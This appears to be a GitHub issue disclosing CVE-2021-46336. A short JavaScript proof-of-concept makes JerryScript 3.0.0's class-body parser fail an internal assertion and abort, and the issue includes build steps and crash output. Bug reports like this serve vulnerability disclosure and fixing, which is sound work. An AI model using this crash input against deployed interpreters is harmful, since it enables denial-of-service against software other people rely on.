CVE-2021-46336: Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656. · Issue #4927 · jerryscript-project/jerryscript
The assertion ‘opts & PARSER_CLASS_LITERAL_CTOR_PRESENT’ fails at /parser/js/js-parser-expr.c(parser_parse_class_body) in JerryScript 3.0.0.
JerryScript revision
Commit: a6ab5e9
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
Test case
poc.js
function assert(a, b) {
  if (a != b)
    throw "FAIL";
}
function JSEtest(script) {
  try {
    eval(script);
  } catch (e) {
    return e;
  }
}
assert(JSEtest("class C1 { async;constructor() { } }"), "SyntaxError: Cannot declare an async method named 'constructor'.");
assert(JSEtest("class C1 { *constructor() { } }"), "SyntaxError: Cannot declare a generator function named 'constructor'.");
assert(JSEtest("class C1 { async *constructor() { } }"), "SyntaxError: Cannot declare an async generator method named 'constructor'.");
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion ‘opts & PARSER_CLASS_LITERAL_CTOR_PRESENT’ failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656.
Error: ERR_FAILED_INTERNAL_ASSERTION
[1] 31519 abort jerry poc.js
Credits: Found by OWL337 team.